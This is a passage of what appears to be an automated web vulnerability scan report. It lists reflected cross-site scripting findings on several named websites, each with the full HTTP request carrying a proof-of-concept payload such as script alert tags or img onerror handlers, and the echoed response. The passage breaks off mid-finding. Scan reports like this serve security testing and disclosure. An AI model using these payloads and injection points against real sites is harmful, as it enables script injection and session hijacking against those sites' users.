<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Welcome | Jap
...[SNIP]...
<a href="http://www.japanator.com/elephant/templates2c144"><script>alert(1)</script>851007136eb/styles2011.css?x=05.18.10a&start=8&skip=features">
...[SNIP]...

7.75. http://www.japanator.com/elephant/templates/styles2011.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.japanator.com
Path:   /elephant/templates/styles2011.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 939e9"><script>alert(1)</script>da3114cdcf2 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /elephant/templates/styles2011.css939e9"><script>alert(1)</script>da3114cdcf2?x=05.18.10a HTTP/1.1
Host: www.japanator.com
Proxy-Connection: keep-alive
Referer: http://www.japanator.com/favicon.ico'
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.2.9
Content-type: text/html
Date: Mon, 02 May 2011 01:57:40 GMT
Server: lighttpd/1.4.28
Content-Length: 112284


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Welcome | Jap
...[SNIP]...
<a href="http://www.japanator.com/elephant/templates/styles2011.css939e9"><script>alert(1)</script>da3114cdcf2?x=05.18.10a&start=8&skip=features">
...[SNIP]...

7.76. http://www.japanator.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.japanator.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4c63b"><script>alert(1)</script>46c4dffc34d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico4c63b"><script>alert(1)</script>46c4dffc34d HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.japanator.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.2.9
Content-type: text/html
Date: Mon, 02 May 2011 00:15:04 GMT
Server: lighttpd/1.4.28
Content-Length: 112248


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Welcome | Jap
...[SNIP]...
<a href="http://www.japanator.com/favicon.ico4c63b"><script>alert(1)</script>46c4dffc34d?start=8&skip=features">
...[SNIP]...

7.77. http://www.jhoos.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.jhoos.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f9bd4"-alert(1)-"de46a400726 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icof9bd4"-alert(1)-"de46a400726 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.jhoos.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.3.3-0.dotdeb.1
Set-Cookie: PHPSESSID=g0ij568rmka3ulclrpt5nhoec4; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: policyref="http://www.jhoos.com/w3c/p3p.xml", CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Content-type: text/html
Date: Sun, 01 May 2011 23:37:17 GMT
Server: lighttpd/1.4.28-devel-485M
Content-Length: 6926

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<HTML>
<HEAD>
<TITLE>Social Networking Services in Favicon.icof9bd4"-alert(1)-"de46a400726</TITLE>
<meta name="description" content="Jho
...[SNIP]...
<script type="text/javascript">
function vp(uname)
{
   window.location.href = "http://profiles.jhoos.com/"+uname;
}
function pg(pg)
{
   window.location.href = "http://www.jhoos.com/favicon.icof9bd4"-alert(1)-"de46a400726--"+pg;
}
</script>
...[SNIP]...

7.78. http://www.jhoos.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.jhoos.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 17e5b<a>fb17bacaecf was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /favicon.ico17e5b<a>fb17bacaecf HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.jhoos.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.3.3-0.dotdeb.1
Set-Cookie: PHPSESSID=bsf5hppdchrs7ogv1uva6oq6j4; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: policyref="http://www.jhoos.com/w3c/p3p.xml", CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Content-type: text/html
Date: Sun, 01 May 2011 23:37:17 GMT
Server: lighttpd/1.4.28-devel-485M
Content-Length: 6872

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<HTML>
<HEAD>
<TITLE>Social Networking Services in Favicon.ico17e5b<a>fb17bacaecf</TITLE>
<meta name="description" content="Jhoos is a S
...[SNIP]...
<h2>Favicon.ico17e5b<a>fb17bacaecf - Social Networking Service</h2>
...[SNIP]...

7.79. http://www.jhoos.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.jhoos.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 66ab3"><a>93ba235f49e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /favicon.ico66ab3"><a>93ba235f49e HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.jhoos.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.3.3-0.dotdeb.1
Set-Cookie: PHPSESSID=in94nd37n4bgqenf549sce0po2; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: policyref="http://www.jhoos.com/w3c/p3p.xml", CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Content-type: text/html
Date: Sun, 01 May 2011 23:37:16 GMT
Server: lighttpd/1.4.28-devel-485M
Content-Length: 6884

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<HTML>
<HEAD>
<TITLE>Social Networking Services in Favicon.ico66ab3"><a>93ba235f49e</TITLE>
<meta name="description" content="Jhoos is a Social Networking service in Favicon.ico66ab3"><a>93ba235f49e. No subscription fees and lifetime membership with text and audio video chat features. Download now and join Jhoos to meet your soulmate.">
...[SNIP]...

7.80. http://www.lenox.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.lenox.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 173eb"><a>a0411f48fb2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /favicon.ico173eb"><a>a0411f48fb2 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.lenox.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 404 Not Found
Server: Microsoft-IIS/5.0
Date: Sun, 01 May 2011 23:56:31 GMT
X-Powered-By: ASP.NET
Connection: close
Set-Cookie: CFID=15918175;expires=Tue, 23-Apr-2041 23:56:32 GMT;path=/
Set-Cookie: CFTOKEN=981019a1f9e493e2-ADFDF4B8-BFA4-2A91-25D8EA90828DDE67;expires=Tue, 23-Apr-2041 23:56:32 GMT;path=/
Content-Type: text/html; charset=UTF-8


   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
   <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
       <head>

           <
...[SNIP]...
<a href="/404handler.cfm?inbound=?404;http://www.lenox.com/favicon.ico173eb"><a>a0411f48fb2&forceLogin=1">
...[SNIP]...

7.81. http://www.lenox.com/favicon.ico [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.lenox.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 85b0a"><a>2482c2c1d93 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /favicon.ico?85b0a"><a>2482c2c1d93=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.lenox.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 404 Not Found
Server: Microsoft-IIS/5.0
Date: Sun, 01 May 2011 23:55:55 GMT
X-Powered-By: ASP.NET
Connection: close
Set-Cookie: CFID=15918082;expires=Tue, 23-Apr-2041 23:55:55 GMT;path=/
Set-Cookie: CFTOKEN=bc814721ef0ecd70-ADFD650B-A288-A196-8159C84365A59A5F;expires=Tue, 23-Apr-2041 23:55:55 GMT;path=/
Content-Type: text/html; charset=UTF-8


   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
   <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
       <head>

           <
...[SNIP]...
<a href="/404handler.cfm?inbound=?404;http://www.lenox.com/favicon.ico?85b0a"><a>2482c2c1d93=1&forceLogin=1">
...[SNIP]...

7.82. http://www.mygiftcardsite.com/favicon.ico [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mygiftcardsite.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 47e95"><script>alert(1)</script>95ad170de98 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico?47e95"><script>alert(1)</script>95ad170de98=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mygiftcardsite.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:19:37 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 442


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>

<head>
<title>Manage Your Gift Card </title>

</head>
<frameset rows="100%,*" border
...[SNIP]...
<frame src="http://www.kpfprepaid.com/mygiftcardsite//favicon.ico?47e95"><script>alert(1)</script>95ad170de98=1" frameborder="0" />
...[SNIP]...

7.83. http://www.seoq.com/quotient/2011/04/22/1797/N [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /quotient/2011/04/22/1797/N

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload bb710<img%20src%3da%20onerror%3dalert(1)>f86d9201f7 was submitted in the REST URL parameter 5. This input was echoed as bb710<img src=a onerror=alert(1)>f86d9201f7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /quotient/2011/04/22/1797bb710<img%20src%3da%20onerror%3dalert(1)>f86d9201f7/N HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:53:46 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=UTF-8
Content-Length: 55819


<pre class="cake-debug">
<a href='javascript:void(0);' onclick='document.getElementById("CakeStackTrace1").style.display = (document.getElementById("CakeStackTrace1").style.display == "none" ? "" : "
...[SNIP]...
< 1797bb710<img src=a onerror=alert(1)>f86d9201f7 and
site_url LIKE 'N' ORDER BY `report_date` DESC LIMIT 2 </p>
...[SNIP]...

7.84. http://www.seoq.com/quotient/2011/04/22/1797/N [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.seoq.com
Path:   /quotient/2011/04/22/1797/N

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e4959'%3b64a48987fe2 was submitted in the REST URL parameter 5. This input was echoed as e4959';64a48987fe2 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /quotient/2011/04/22/1797e4959'%3b64a48987fe2/N HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:53:40 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5; expires=Mon, 09-May-2011 02:53:40 GMT; path=/quotient
Content-Type: text/html; charset=UTF-8
Content-Length: 50755


<pre class="cake-debug">
<a href='javascript:void(0);' onclick='document.getElementById("CakeStackTrace1").style.display = (document.getElementById("CakeStackTrace1").style.display == "none" ? "" : "
...[SNIP]...
<script type="text/javascript">    
$(function() {
$("#tabs").tabs();
});

function fbs_click() {u='http://www.seoq.com/quotient/2011/04/22/1797e4959';64a48987fe2/N';t='facebook_status';window.open('http://www.facebook.com/sharer.php?u='+encodeURIComponent(u)+'&t='+encodeURIComponent(t),'sharer','toolbar=0,status=0,width=626,height=436');return false;}

...[SNIP]...

7.85. http://www.seoq.com/quotient/2011/04/22/1797/N [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /quotient/2011/04/22/1797/N

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2234c"><img%20src%3da%20onerror%3dalert(1)>163cbf2dcf5 was submitted in the REST URL parameter 5. This input was echoed as 2234c"><img src=a onerror=alert(1)>163cbf2dcf5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /quotient/2011/04/22/17972234c"><img%20src%3da%20onerror%3dalert(1)>163cbf2dcf5/N HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:53:39 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=UTF-8
Content-Length: 56035


<pre class="cake-debug">
<a href='javascript:void(0);' onclick='document.getElementById("CakeStackTrace1").style.display = (document.getElementById("CakeStackTrace1").style.display == "none" ? "" : "
...[SNIP]...
<a href="http://www.seoq.com/quotient/2011/04/22/17972234c"><img src=a onerror=alert(1)>163cbf2dcf5/N" title="SEO Quotient for ">
...[SNIP]...

7.86. http://www.seoq.com/quotient/2011/04/22/1797/N [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.seoq.com
Path:   /quotient/2011/04/22/1797/N

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c0d36'%3bff7a243e32d was submitted in the REST URL parameter 6. This input was echoed as c0d36';ff7a243e32d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /quotient/2011/04/22/1797/Nc0d36'%3bff7a243e32d HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:54:11 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=UTF-8
Content-Length: 54542


<pre class="cake-debug">
<a href='javascript:void(0);' onclick='document.getElementById("CakeStackTrace1").style.display = (document.getElementById("CakeStackTrace1").style.display == "none" ? "" : "
...[SNIP]...
<script type="text/javascript">    
$(function() {
$("#tabs").tabs();
});

function fbs_click() {u='http://www.seoq.com/quotient/2011/04/22/1797/Nc0d36';ff7a243e32d';t='facebook_status';window.open('http://www.facebook.com/sharer.php?u='+encodeURIComponent(u)+'&t='+encodeURIComponent(t),'sharer','toolbar=0,status=0,width=626,height=436');return false;}

...[SNIP]...

7.87. http://www.seoq.com/quotient/2011/04/22/1797/N [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /quotient/2011/04/22/1797/N

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 96a80<img%20src%3da%20onerror%3dalert(1)>b27d9153174 was submitted in the REST URL parameter 6. This input was echoed as 96a80<img src=a onerror=alert(1)>b27d9153174 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /quotient/2011/04/22/1797/N96a80<img%20src%3da%20onerror%3dalert(1)>b27d9153174 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:54:14 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5; expires=Mon, 09-May-2011 02:54:15 GMT; path=/quotient
Content-Type: text/html; charset=UTF-8
Content-Length: 48054

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<title>SEO Diagnostics Tool</t
...[SNIP]...
<img src=a onerror=alert(1)>b27d9153174" title="SEO Quotient for ">http://www.seoq.com/quotient/2011/04/22/1797/N96a80<img src=a onerror=alert(1)>b27d9153174ddd</a>
...[SNIP]...

7.88. http://www.seoq.com/quotient/2011/04/22/1797/N [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /quotient/2011/04/22/1797/N

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f2db8"><img%20src%3da%20onerror%3dalert(1)>1717bae1296 was submitted in the REST URL parameter 6. This input was echoed as f2db8"><img src=a onerror=alert(1)>1717bae1296 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /quotient/2011/04/22/1797/Nf2db8"><img%20src%3da%20onerror%3dalert(1)>1717bae1296 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:54:11 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5; expires=Mon, 09-May-2011 02:54:11 GMT; path=/quotient
Content-Type: text/html; charset=UTF-8
Content-Length: 48178

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<title>SEO Diagnostics Tool</t
...[SNIP]...
<a href="http://www.seoq.com/quotient/2011/04/22/1797/Nf2db8"><img src=a onerror=alert(1)>1717bae1296" title="SEO Quotient for ">
...[SNIP]...

7.89. http://www.seoq.com/quotient/2011/04/22/1798/N [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /quotient/2011/04/22/1798/N

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 3cde8<img%20src%3da%20onerror%3dalert(1)>ac3da70dbcd was submitted in the REST URL parameter 5. This input was echoed as 3cde8<img src=a onerror=alert(1)>ac3da70dbcd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /quotient/2011/04/22/17983cde8<img%20src%3da%20onerror%3dalert(1)>ac3da70dbcd/N HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:52:15 GMT
Server: Apache
Set-Cookie: CAKEPHP=klvfjcoqnigb9gf7llh10nva93; expires=Mon, 09-May-2011 02:52:16 GMT; path=/quotient
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=UTF-8
Content-Length: 55865


<pre class="cake-debug">
<a href='javascript:void(0);' onclick='document.getElementById("CakeStackTrace1").style.display = (document.getElementById("CakeStackTrace1").style.display == "none" ? "" : "
...[SNIP]...
< 17983cde8<img src=a onerror=alert(1)>ac3da70dbcd and
site_url LIKE 'N' ORDER BY `report_date` DESC LIMIT 2 </p>
...[SNIP]...

7.90. http://www.seoq.com/quotient/2011/04/22/1798/N [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.seoq.com
Path:   /quotient/2011/04/22/1798/N

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 907d9'%3b9801195d799 was submitted in the REST URL parameter 5. This input was echoed as 907d9';9801195d799 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /quotient/2011/04/22/1798907d9'%3b9801195d799/N HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:52:09 GMT
Server: Apache
Set-Cookie: CAKEPHP=9l1il1vf6rn9o4vqk2b9euqg23; expires=Mon, 09-May-2011 02:52:09 GMT; path=/quotient
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=UTF-8
Content-Length: 54591


<pre class="cake-debug">
<a href='javascript:void(0);' onclick='document.getElementById("CakeStackTrace1").style.display = (document.getElementById("CakeStackTrace1").style.display == "none" ? "" : "
...[SNIP]...
<script type="text/javascript">    
$(function() {
$("#tabs").tabs();
});

function fbs_click() {u='http://www.seoq.com/quotient/2011/04/22/1798907d9';9801195d799/N';t='facebook_status';window.open('http://www.facebook.com/sharer.php?u='+encodeURIComponent(u)+'&t='+encodeURIComponent(t),'sharer','toolbar=0,status=0,width=626,height=436');return false;}

...[SNIP]...

7.91. http://www.seoq.com/quotient/2011/04/22/1798/N [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /quotient/2011/04/22/1798/N

Issue detail

